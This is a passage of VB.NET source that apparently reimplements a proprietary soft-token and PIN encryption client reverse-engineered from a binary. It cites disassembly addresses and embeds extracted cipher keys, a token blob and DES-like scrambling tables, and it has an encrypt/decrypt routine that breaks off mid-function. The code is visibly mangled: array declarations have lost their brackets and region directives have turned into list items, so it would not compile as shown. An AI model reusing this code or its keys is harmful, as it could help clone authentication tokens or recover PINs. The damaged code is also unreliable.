FileSystem.FileOpen(FileHandle, "Array_A", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, a) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_B", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, b) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_C", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, c) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_E", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, e) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_F", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, f) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_G", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, g) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_H", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, h) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_I", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, i) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_J", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, j) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_L", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, l) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_M", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, m) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_N", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, n) : FileSystem.FileClose(FileHandle) FileSystem.FileOpen(FileHandle, "Array_O", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) : FileSystem.FilePut(FileHandle, o) : FileSystem.FileClose(FileHandle)

End Sub

End Module

'============================================================================================================================ ' 3: MOD CLIENT: '============================================================================================================================ Module modClient 'Dim TokenCounter As Integer = &H4D3C2B1A 'Dim TokenCounter As Integer = 12

Public Key1_Enigma As Byte = {&HFF, &H45, &H6E, &H69, &H67, &H6D, &H61, &H80}           ' FFh + "Enigma" + 80h  , Used in encrypting PIN 1st time                   SERVER: CipherKey1 Public Key2_Source As Byte = {&H3, &HCE, &H4A, &HA3, &H56, &H77, &HF2, &H91}            '                       , Used in encrypting PIN 2nd time                   SERVER: CipherKey3 Public Key3_Logic As Byte = {&HFF, &H4C, &H6F, &H67, &H69, &H63, &H2C, &H80}            ' FFh + "Logic," + 80h  , Used in encrypting PIN 3rd time                   SERVER: CipherKey2 Public Key4_Source As Byte = {&H81, &H35, &HF0, &H14, &H1D, &HBC, &HE8, &H62}           '                       , Used in Call_2; encrypting PIN 4th time           SERVER: CipherKey4

Dim PushesSubTable01(-1) As Byte Dim PushesSubTable02(-1) As Byte Dim PushesSubTable03(-1) As Byte Dim PushesSubTable04(-1) As Byte Dim PushesSubTable05(-1) As Byte Dim PushesSubTable06(-1) As Byte Dim PushesSubTable07(-1) As Byte Dim PushesSubTable08(-1) As Byte Dim PushesSubTable09(-1) As Byte Dim PushesSubTable0A(-1) As Byte Dim PushesSubTable0B(-1) As Byte Dim PushesSubTable0C(-1) As Byte Dim PushesSubTable0D(-1) As Byte Dim PushesSubTable0E(-1) As Byte Dim PushesSubTable0F(-1) As Byte Dim PushesSubTable10(-1) As Byte

'Dim OriginalSoftToken As Byte = { _ '                                  &H2B, &H2D, &H36, &H20, &H42, &HB4, &H3A, &HA7, &H7C, &H39, &H61, &H5D, &HC4, &H90, &HCD, &H2E _ '                               , &HC6, &HE8, &HCA, &H99, &H6F, &H22, &HC0, &H4F, &H19, &H1A, &HD3, &HD6, &HC4, &HA2, &HD9, &H32 _ '                                 }                                                                                                 ' After the above, it would say "Standard Token"

'Dim OriginalSoftToken As Byte = { _ '                                   &HB5, &H39, &HA2, &H31, &H20, &HD4, &H65, &H6F, &H4A, &HA7, &H83, &H14, &H3D, &HE5, &HF7, &HBB _ '                                , &H4, &H24, &HEB, &HDA, &HCF, &H71, &HDB, &H44, &H63, &HEA, &H3D, &H83, &HD2, &H94, &HD4, &HBC _ '                                 }                                                                                                 ' After the above, it would say "Standard Token"

'Dim OriginalSoftToken As Byte = { _ '                                   &H14, &H52, &HD4, &HBB, &H70, &H51, &HDB, &HBB, &HBD, &HD3, &H52, &H82, &H6E, &H6, &HE3, &H5A _ '                                , &HC6, &HE8, &HCA, &H99, &H6F, &H22, &HC0, &H4F, &H19, &H1A, &HD3, &HD6, &HC4, &HA2, &HD9, &H32 _ '                                  }                                                                                                 ' After the above, it would say "Standard Token"

Dim OriginalSoftToken As Byte = { _ &H70, &HBA, &H3D, &H7, &H98, &H2C, &H6D, &HB2, &H74, &H56, &H42, &HE6, &H8F, &H64, &H19, &H62 _ , &HC6, &HE8, &HCA, &H99, &H6F, &H22, &HC0, &H4F, &H19, &H1A, &HD3, &HD6, &HC4, &HA2, &HD9, &H32 _ }                                                                                                ' After the above, it would say "Standard Token"

' Table Generator Section (File: .10019060 x E0h bytes)... After forming to see the missing bytes, I am seeing the missing (20h, 28h, 30h, 38h, 40h) ' &H01, &H02, &H03, &H04, &H05, &H06, &H07, &H08, &H09, &H0a, &H0b, &H0c, &H0d, &H0e, &H0f, &H10, ' &H11, &H12, &H13, &H14, &H15, &H16, &H17, &H18, &H19, &H1a, &H1b, &H1c, &H1d, &H1e, &H1f, ' &H21, &H22, &H23, &H24, &H25, &H26, &H27,   , &H29, &H2a, &H2b, &H2c, &H2d, &H2e, &H2f, ' &H31, &H32, &H33, &H34, &H35, &H36, &H37,   , &H39, &H3a, &H3b, &H3c, &H3d, &H3e, &H3f,
 * 1) Region "Key Scrambling Tables"    ' Starting from .10019060h for 200h bytes

' Original Table below (1ch bytes): Dim KeyScramblerOdd As Byte = { _ &H39, &H31, &H29, &H21, &H19, &H11, &H9, &H1 _ , &H3A, &H32, &H2A, &H22, &H1A, &H12, &HA, &H2 _ , &H3B, &H33, &H2B, &H23, &H1B, &H13, &HB, &H3 _ , &H3C, &H34, &H2C, &H24 _ }

' Original Table below (1ch bytes): Dim KeyScramblerEven As Byte = { _ &H3F, &H37, &H2F, &H27, &H1F, &H17, &HF, &H7 _ , &H3E, &H36, &H2E, &H26, &H1E, &H16, &HE, &H6 _ , &H3D, &H35, &H2D, &H25, &H1D, &H15, &HD, &H5 _ , &H1C, &H14, &HC, &H4 _ }

' Sub Table Generator (File: 10019140 x C0h bytes)... After forming to see the missing bytes, I am seeing the missing (10h, 08h, 09h, 12h, 16h, 18h, 19h, 1dh, 1eh, 1fh) ' &H01, &H02, &H03, &H04, &H05, &H06, &H07,   ,     ,&H0a, &H0b, &H0c, &H0d, &H0e, &H0f, ' &H11,   , &H13, &H14, &H15,     , &H17,     ,     ,&H1a, &H1b, &H1c, ' ' Sub Table Generator_X2... After forming to see the missing bytes, I am seeing the missing (30h-38h, 3fh, 40h, 42h, 47h, 52h, 55h-60h ) '   ,     ,     ,     ,     ,     ,     ,     ,     , &H39, &H3a, &H3b, &H3c, &H3d, &H3e, ' &H40, &H41,   , &H43, &H44, &H45, &H46,     , &H48, &H49, &H4a, &H4b, &H4c, &H4d, &H4e, &H4f, ' &H50, &H51,   , &H53, &H54, ' Original Table below (30h bytes) Dim TableScramblerSub As Byte = { _ &HE, &H11, &HB, &H18, &H1, &H5, &H3, &H1C, &HF, &H6, &H15, &HA, &H17, &H13, &HC, &H4 _ , &H1A, &H8, &H10, &H7, &H1B, &H14, &HD, &H2, &H45, &H50, &H3B, &H41, &H4B, &H53, &H3A, &H44 _ , &H4F, &H49, &H3D, &H4C, &H48, &H4D, &H43, &H54, &H3E, &H51, &H4A, &H46, &H4E, &H40, &H39, &H3C _ } ' The above TableScrambeller and TableScrambellerSub are 200h bytes long
 * 1) End Region

Dim EncryptionTable As Byte = { _ &HE, &H0, &H4, &HF, &HD, &H7, &H1, &H4, &H2, &HE, &HF, &H2, &HB, &HD, &H8, &H1 _ , &H3, &HA, &HA, &H6, &H6, &HC, &HC, &HB, &H5, &H9, &H9, &H5, &H0, &H3, &H7, &H8 _ , &H4, &HF, &H1, &HC, &HE, &H8, &H8, &H2, &HD, &H4, &H6, &H9, &H2, &H1, &HB, &H7 _ , &HF, &H5, &HC, &HB, &H9, &H3, &H7, &HE, &H3, &HA, &HA, &H0, &H5, &H6, &H0, &HD _ , &HF, &H3, &H1, &HD, &H8, &H4, &HE, &H7, &H6, &HF, &HB, &H2, &H3, &H8, &H4, &HE _ , &H9, &HC, &H7, &H0, &H2, &H1, &HD, &HA, &HC, &H6, &H0, &H9, &H5, &HB, &HA, &H5 _ , &H0, &HD, &HE, &H8, &H7, &HA, &HB, &H1, &HA, &H3, &H4, &HF, &HD, &H4, &H1, &H2 _ , &H5, &HB, &H8, &H6, &HC, &H7, &H6, &HC, &H9, &H0, &H3, &H5, &H2, &HE, &HF, &H9 _ , &HA, &HD, &H0, &H7, &H9, &H0, &HE, &H9, &H6, &H3, &H3, &H4, &HF, &H6, &H5, &HA _ , &H1, &H2, &HD, &H8, &HC, &H5, &H7, &HE, &HB, &HC, &H4, &HB, &H2, &HF, &H8, &H1 _ , &HD, &H1, &H6, &HA, &H4, &HD, &H9, &H0, &H8, &H6, &HF, &H9, &H3, &H8, &H0, &H7 _ , &HB, &H4, &H1, &HF, &H2, &HE, &HC, &H3, &H5, &HB, &HA, &H5, &HE, &H2, &H7, &HC _ , &H7, &HD, &HD, &H8, &HE, &HB, &H3, &H5, &H0, &H6, &H6, &HF, &H9, &H0, &HA, &H3 _ , &H1, &H4, &H2, &H7, &H8, &H2, &H5, &HC, &HB, &H1, &HC, &HA, &H4, &HE, &HF, &H9 _ , &HA, &H3, &H6, &HF, &H9, &H0, &H0, &H6, &HC, &HA, &HB, &H1, &H7, &HD, &HD, &H8 _ , &HF, &H9, &H1, &H4, &H3, &H5, &HE, &HB, &H5, &HC, &H2, &H7, &H8, &H2, &H4, &HE _ , &H2, &HE, &HC, &HB, &H4, &H2, &H1, &HC, &H7, &H4, &HA, &H7, &HB, &HD, &H6, &H1 _ , &H8, &H5, &H5, &H0, &H3, &HF, &HF, &HA, &HD, &H3, &H0, &H9, &HE, &H8, &H9, &H6 _ , &H4, &HB, &H2, &H8, &H1, &HC, &HB, &H7, &HA, &H1, &HD, &HE, &H7, &H2, &H8, &HD _ , &HF, &H6, &H9, &HF, &HC, &H0, &H5, &H9, &H6, &HA, &H3, &H4, &H0, &H5, &HE, &H3 _ , &HC, &HA, &H1, &HF, &HA, &H4, &HF, &H2, &H9, &H7, &H2, &HC, &H6, &H9, &H8, &H5 _ , &H0, &H6, &HD, &H1, &H3, &HD, &H4, &HE, &HE, &H0, &H7, &HB, &H5, &H3, &HB, &H8 _ , &H9, &H4, &HE, &H3, &HF, &H2, &H5, &HC, &H2, &H9, &H8, &H5, &HC, &HF, &H3, &HA _ , &H7, &HB, &H0, &HE, &H4, &H1, &HA, &H7, &H1, &H6, &HD, &H0, &HB, &H8, &H6, &HD _ , &H4, &HD, &HB, &H0, &H2, &HB, &HE, &H7, &HF, &H4, &H0, &H9, &H8, &H1, &HD, &HA _ , &H3, &HE, &HC, &H3, &H9, &H5, &H7, &HC, &H5, &H2, &HA, &HF, &H6, &H8, &H1, &H6 _ , &H1, &H6, &H4, &HB, &HB, &HD, &HD, &H8, &HC, &H1, &H3, &H4, &H7, &HA, &HE, &H7 _ , &HA, &H9, &HF, &H5, &H6, &H0, &H8, &HF, &H0, &HE, &H5, &H2, &H9, &H3, &H2, &HC _ , &HD, &H1, &H2, &HF, &H8, &HD, &H4, &H8, &H6, &HA, &HF, &H3, &HB, &H7, &H1, &H4 _ , &HA, &HC, &H9, &H5, &H3, &H6, &HE, &HB, &H5, &H0, &H0, &HE, &HC, &H9, &H7, &H2 _ , &H7, &H2, &HB, &H1, &H4, &HE, &H1, &H7, &H9, &H4, &HC, &HA, &HE, &H8, &H2, &HD _ , &H0, &HF, &H6, &HC, &HA, &H9, &HD, &H0, &HF, &H3, &H3, &H5, &H5, &H6, &H8, &HB _ }
 * 1) Region "Encryption Base Table" ' Starting from .10019200h for 200h bytes
 * 1) End Region

Dim PinScrambellingTable1_ODD As Byte = { _ &H3A, &H32, &H2A, &H22, &H1A, &H12, &HA, &H2, &H3C, &H34, &H2C, &H24, &H1C, &H14, &HC, &H4 _ , &H3E, &H36, &H2E, &H26, &H1E, &H16, &HE, &H6, &H40, &H38, &H30, &H28, &H20, &H18, &H10, &H8 _ }
 * 1) Region "PIN Scrambelling Tables"     ' Starts from (File: .10019400, and takes 230h bytes)

Dim PinScrambellingTable1_EVEN As Byte = { _ &H39, &H31, &H29, &H21, &H19, &H11, &H9, &H1, &H3B, &H33, &H2B, &H23, &H1B, &H13, &HB, &H3 _ , &H3D, &H35, &H2D, &H25, &H1D, &H15, &HD, &H5, &H3F, &H37, &H2F, &H27, &H1F, &H17, &HF, &H7 _ }

Dim PinScrambellingTable2 As Byte = { _ &H20, &H1, &H2, &H3, &H4, &H5, &H4, &H5, &H6, &H7, &H8, &H9, &H8, &H9, &HA, &HB _ , &HC, &HD, &HC, &HD, &HE, &HF, &H10, &H11, &H10, &H11, &H12, &H13, &H14, &H15, &H14, &H15 _ , &H16, &H17, &H18, &H19, &H18, &H19, &H1A, &H1B, &H1C, &H1D, &H1C, &H1D, &H1E, &H1F, &H20, &H1 _ }

Dim PinScrambellingTable3 As Byte = { _ &H10, &H7, &H14, &H15, &H1D, &HC, &H1C, &H11, &H1, &HF, &H17, &H1A, &H5, &H12, &H1F, &HA _ , &H2, &H8, &H18, &HE, &H20, &H1B, &H3, &H9, &H13, &HD, &H1E, &H6, &H16, &HB, &H4, &H19 _ }

Public CodeScramblingFinal1 As Byte = { _ &H1, &H7, &H2, &H4, &H1, &H0, &H2, &H3, &H1, &H1, &H1, &H4, &H1, &H3, &H2, &H1 _ , &H1, &H6, &H2, &H2, &H2, &H6, &H1, &H2, &H2, &H7, &H1, &H5, &H2, &H0, &H2, &H5 _ }


 * 1) End Region

Dim CodeWeightTable As Byte = { _ &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0 _ , &H20, &H0, &H28, &H0, &H28, &H0, &H28, &H0, &H28, &H0, &H28, &H0, &H20, &H0, &H20, &H0 _ , &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0 _ , &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0, &H20, &H0 _ , &H48, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0 _ , &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0 _ , &H84, &H0, &H84, &H0, &H84, &H0, &H84, &H0, &H84, &H0, &H84, &H0, &H84, &H0, &H84, &H0 _ , &H84, &H0, &H84, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0 _ , &H10, &H0, &H81, &H0, &H81, &H0, &H81, &H0, &H81, &H0, &H81, &H0, &H81, &H0, &H1, &H0 _ , &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0 _ , &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0, &H1, &H0 _ , &H1, &H0, &H1, &H0, &H1, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0 _ , &H10, &H0, &H82, &H0, &H82, &H0, &H82, &H0, &H82, &H0, &H82, &H0, &H82, &H0, &H2, &H0 _ , &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0 _ , &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0, &H2, &H0 _ , &H2, &H0, &H2, &H0, &H2, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H10, &H0, &H20, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 _ , &H0, &H0, &H1, &H0, &H0, &H0, &H2E, &H0, &H0, &H0, &H1, &H0, &H0, &H0, &H0, &H0 _ }
 * 1) Region "CodeWeight"     ' Starts from (File: .1001A012, and is 200h bytes)
 * 1) End Region

Private Function GenerateScrambled1Array(ByVal SourceArray As Byte) As Byte Dim TempBuffer(-1) As Byte Dim I, J As Integer Dim B As Byte

If SourceArray.Length >= &H40 Then ReDim TempBuffer(&H1C + &H1C + &H1C + &H1C - 1) ' VB array are 0-based...

For I = 0 To UBound(KeyScramblerOdd) B = KeyScramblerOdd(I) B = SourceArray(B - 1)      ' Making B (0-based) TempBuffer(I) = B   TempBuffer(I + &H1C) = B   Next

For I = 0 To UBound(KeyScramblerEven) B = KeyScramblerEven(I) B = SourceArray(B - 1)      ' Making B (0-based) TempBuffer(I + &H1C + &H1C) = B   TempBuffer(I + &H1C + &H1C + &H1C) = B   Next End If

GenerateScrambled1Array = TempBuffer End Function

Private Function BuildPushesSubTable(ByVal SourceArray As Byte, ByVal Offset As Integer) As Byte ' Offset into the original SourceArray...

Dim TempBuffer(-1) As Byte Dim I, J As Integer Dim B As Byte

If SourceArray.Length > 0 Then ReDim TempBuffer(&H30 - 1)       ' VB 0-size array...

For I = 0 To UBound(TableScramblerSub) B = TableScramblerSub(I) B = SourceArray(Offset + B)   TempBuffer(I) = B   Next End If

BuildPushesSubTable = TempBuffer End Function

Private Sub BuildPushesTables(ByRef SourceTable As Byte, ByVal Direction As Integer) If Direction = 0 Then ' use the normal build PushesSubTable01 = BuildPushesSubTable(SourceTable, &H0) PushesSubTable02 = BuildPushesSubTable(SourceTable, &H1) PushesSubTable03 = BuildPushesSubTable(SourceTable, &H3) PushesSubTable04 = BuildPushesSubTable(SourceTable, &H5) PushesSubTable05 = BuildPushesSubTable(SourceTable, &H7) PushesSubTable06 = BuildPushesSubTable(SourceTable, &H9) PushesSubTable07 = BuildPushesSubTable(SourceTable, &HB) PushesSubTable08 = BuildPushesSubTable(SourceTable, &HD) PushesSubTable09 = BuildPushesSubTable(SourceTable, &HE) PushesSubTable0A = BuildPushesSubTable(SourceTable, &H10) PushesSubTable0B = BuildPushesSubTable(SourceTable, &H12) PushesSubTable0C = BuildPushesSubTable(SourceTable, &H14) PushesSubTable0D = BuildPushesSubTable(SourceTable, &H16) PushesSubTable0E = BuildPushesSubTable(SourceTable, &H18) PushesSubTable0F = BuildPushesSubTable(SourceTable, &H1A) PushesSubTable10 = BuildPushesSubTable(SourceTable, &H1B) Else ' use a reverse build: PushesSubTable10 = BuildPushesSubTable(SourceTable, &H0) PushesSubTable0F = BuildPushesSubTable(SourceTable, &H1) PushesSubTable0E = BuildPushesSubTable(SourceTable, &H3) PushesSubTable0D = BuildPushesSubTable(SourceTable, &H5) PushesSubTable0C = BuildPushesSubTable(SourceTable, &H7) PushesSubTable0B = BuildPushesSubTable(SourceTable, &H9) PushesSubTable0A = BuildPushesSubTable(SourceTable, &HB) PushesSubTable09 = BuildPushesSubTable(SourceTable, &HD) PushesSubTable08 = BuildPushesSubTable(SourceTable, &HE) PushesSubTable07 = BuildPushesSubTable(SourceTable, &H10) PushesSubTable06 = BuildPushesSubTable(SourceTable, &H12) PushesSubTable05 = BuildPushesSubTable(SourceTable, &H14) PushesSubTable04 = BuildPushesSubTable(SourceTable, &H16) PushesSubTable03 = BuildPushesSubTable(SourceTable, &H18) PushesSubTable02 = BuildPushesSubTable(SourceTable, &H1A) PushesSubTable01 = BuildPushesSubTable(SourceTable, &H1B) End If End Sub

Private Sub ScramblePINBitArray(ByVal SourceArray As Byte, ByRef ScrambelledPart01 As Byte, ByRef ScrambelledPart02 As Byte, ByRef ScrambelledPart03 As Byte) Dim I, J As Integer Dim B As Byte

ReDim ScrambelledPart01(-1)            ' 1001D6B4 ReDim ScrambelledPart02(-1)            ' 1001D6D4 ReDim ScrambelledPart03(-1)            ' 1001D6F4

If SourceArray.Length > 0 Then ReDim ScrambelledPart01(&H20 - 1) ReDim ScrambelledPart02(&H20 - 1) ReDim ScrambelledPart03(&H20 - 1)

For I = 0 To &H1F B = PinScrambellingTable1_ODD(I) ScrambelledPart02(I) = SourceArray(B - 1)

B = PinScrambellingTable1_EVEN(I) ScrambelledPart01(I) = SourceArray(B - 1) ScrambelledPart03(I) = SourceArray(B - 1) Next End If End Sub

Private Sub ScrambleXOR1Pin(ByRef SourceArray1 As Byte, ByRef ScrambledPINPart01 As Byte, ByRef XORResult As Byte, ByRef ScrambledDecodedResult As Byte) ' Original 10001865:

Dim I, J, K As Integer Dim B As Byte

' Part-1: For I = 0 To &H2F B = PinScrambellingTable2(I) XORResult(I) = ScrambledPINPart01(B - 1) Xor SourceArray1(I) Next

' Part-2: 'I = 0 'K = 0

'Do ' B = 0 ' For J = 0 To 5 ' B = B << 1 ' B = B + (XORResult(I) And 1)

' I = I + 1 ' Next

' ScrambledDecodedResult(K) = EncryptionTable((K * &H40) + B) ' K = K + 1 'Loop Until I >= &H2F

I = 0 K = 0 Do  B = ((XORResult(I + 0) And 1) << 5) _ Or ((XORResult(I + 1) And 1) << 4) _ Or ((XORResult(I + 2) And 1) << 3) _ Or ((XORResult(I + 3) And 1) << 2) _ Or ((XORResult(I + 4) And 1) << 1) _ Or ((XORResult(I + 5) And 1) << 0)

I = I + 6

ScrambledDecodedResult(K) = EncryptionTable((K * &H40) + B)  K = K + 1 Loop Until I >= &H2F

' Part-3: 'K = 0

'For I = 0 To UBound(ScrambledDecodedResult) ' B = ScrambledDecodedResult(I)

' For J = 0 To 3 ' XORResult(K) = B >> (3 - J)

' K = K + 1 ' Next 'Next

K = 0 For I = 0 To UBound(ScrambledDecodedResult) B = ScrambledDecodedResult(I)

XORResult(K + 0) = B >> 3 '(3 - 0) XORResult(K + 1) = B >> 2 '(3 - 1) XORResult(K + 2) = B >> 1 '(3 - 2) XORResult(K + 3) = B >> 0 '(3 - 3)

K = K + 4 Next

' Part-4: For I = 0 To &H1F B = PinScrambellingTable3(I) ScrambledPINPart01(I) = XORResult(B - 1) Next

End Sub

Private Function DeScrambleOddEvenPinArray(ByVal SourceArray1 As Byte, ByVal SourceArray2 As Byte) As Byte Dim TempBuffer(-1) As Byte Dim I, J As Integer Dim B As Byte

If SourceArray1.Length > 0 And SourceArray2.Length > 0 Then ReDim TempBuffer(&H40 - 1)

For I = 0 To &H1F B = PinScrambellingTable1_ODD(I) TempBuffer(B - 1) = SourceArray1(I) Next

For I = 0 To &H1F B = PinScrambellingTable1_EVEN(I) TempBuffer(B - 1) = SourceArray2(I) Next End If

DeScrambleOddEvenPinArray = TempBuffer End Function

Private Function HexDecodeBitArray(ByVal SourceArray As Byte, ByVal BitLength As Integer, ByVal RequestedLength As Integer) As Byte Dim I, J, K As Integer Dim B As Byte Dim TempBuffer(-1) As Byte

If SourceArray.Length > 1 And BitLength > 0 Then If BitLength = 4 Then ReDim TempBuffer(Int(UBound(SourceArray) / BitLength)) ElseIf BitLength = 8 Then ReDim TempBuffer(2 * (Int(UBound(SourceArray) / BitLength))) End If

I = 0 K = 0

Do   B = 0

For J = 1 To BitLength B = B << 1 B = B + (SourceArray(I) And 1) I = I + 1 Next

If BitLength = 4 Then            ' i.e. 1-nibble If B >= 0 And B <= 9 Then B = B + &H30 ElseIf B >= &HA Then B = B + &H37 End If

TempBuffer(K) = B   ElseIf BitLength = 8 Then        ' i.e. 2-nibbles J = B    B = (J >> 4) And &HF If B >= 0 And B <= 9 Then B = B + &H30 ElseIf B >= &HA Then B = B + &H37 End If

TempBuffer(K) = B

B = J And &HF If B >= 0 And B <= 9 Then B = B + &H30 ElseIf B >= &HA Then B = B + &H37 End If

TempBuffer(K) = B   End If

K = K + 1 Loop Until I >= UBound(SourceArray) End If

If UBound(TempBuffer) > RequestedLength Then ReDim Preserve TempBuffer(RequestedLength - 1)

HexDecodeBitArray = TempBuffer End Function

Private Function GeneratePinSourceString(ByVal OriginalPIN As String, ByVal KeyArray As Byte, ByVal KeyLength As Integer) As Byte Dim I, J As Integer Dim TempBuffer(-1) As Byte

If KeyLength > 0 Then ReDim TempBuffer(KeyLength - 1)

I = 0 If OriginalPIN <> "" Then Do    TempBuffer(I) = Asc(Mid(OriginalPIN, I + 1, 1)) I = I + 1 Loop While I < Len(OriginalPIN) And I < UBound(TempBuffer) End If

J = 0 For J = I To KeyLength - 1 If J <= UBound(KeyArray) Then TempBuffer(J) = KeyArray(J - I)   Else TempBuffer(J) = 0 End If  Next

End If

GeneratePinSourceString = TempBuffer End Function

Private Function GeneratePinSourceString(ByVal OriginalPIN As Byte, ByVal KeyArray As Byte, ByVal KeyLength As Integer) As Byte Dim I, J As Integer Dim TempBuffer(-1) As Byte

If KeyLength > 0 Then ReDim TempBuffer(KeyLength - 1)

I = 0 If Not OriginalPIN Is Nothing Then Do    TempBuffer(I) = OriginalPIN(I) I = I + 1 Loop While I < UBound(OriginalPIN) And I < UBound(TempBuffer) End If

J = 0 For J = I To KeyLength - 1 If J <= UBound(KeyArray) Then TempBuffer(J) = KeyArray(J - I)   Else TempBuffer(J) = 0 End If  Next

End If

GeneratePinSourceString = TempBuffer End Function

Public Function EncryptDecryptToken(ByVal KeyArray As Byte, ByVal SoftTokenData As Byte, ByVal EncryptionLength As Integer, ByVal PushesDirection As Integer) As Byte  ' 10001940 ' This will be looking similar to EncryptPINDES function below... ' When PushesDirection = 0 then it's an ENCRYPTION request, otherwise it's a DECRYPTION request.

Dim HexDecodedPart(-1) As Byte Dim HexDecodedFull(EncryptionLength - 1) As Byte

Dim ShrKey(-1) As Byte Dim ScrambledKey(-1) As Byte

Dim TokenPart(7) As Byte

Dim I, J As Integer Dim B As Byte

Dim BitBytePin(-1) As Byte

Dim ScrambledBitBytePIN_P1 As Byte Dim ScrambledBitBytePIN_P2 As Byte Dim ScrambledBitBytePIN_P3 As Byte

Dim PinScramblingXORedResult(&H30 - 1) As Byte Dim PinScrambledDecodedResult(&H8 - 1) As Byte

Dim PinDeScrambledAfterXor(-1) As Byte

If PushesDirection <> 0 Then PushesDirection = 1

If KeyArray.Length > 0 Then ShrKey = GenerateByteShiftArray(KeyArray, 8, True) ' CCCC False)                         ' 1000119A   ScrambledKey = GenerateScrambled1Array(ShrKey)                              ' 100011CE   BuildPushesTables(ScrambledKey, PushesDirection)                            ' 1000120D

For I = 0 To (EncryptionLength / 8) - 1 '--- 10001961:   Array.Copy(SoftTokenData, I * 8, TokenPart, 0, 8)

'--- 1000199E: BitBytePin = GenerateByteShiftArray(TokenPart, 8, True) ScramblePINBitArray(BitBytePin, ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, ScrambledBitBytePIN_P3)       ' 10001650

